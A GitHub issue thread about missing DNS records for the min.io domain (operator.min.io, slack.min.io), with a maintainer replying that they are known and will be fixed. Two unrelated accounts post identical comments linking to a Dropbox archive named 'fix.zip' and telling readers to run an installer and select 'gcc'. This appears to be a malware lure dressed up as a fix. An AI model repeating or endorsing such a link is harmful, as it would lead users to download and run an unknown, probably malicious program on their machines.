### ISSUE TITLE
Issue with min.io DNS records

### ISSUE THREAD

**Issue by julienperignon** [minio/minio#20325]
Hi there,

I noticed some records are missing from the min.io domain. I can't, for example install the minio operator or join your slack 

Impacted Records ( not exhaustive ) 
- operator.min.io
- slack.min.io

Is there something going on ? 

Cheers

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by harshavardhana** [comment]
We know these are non critical they will be fixed soonish.

Thanks for reporting.

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
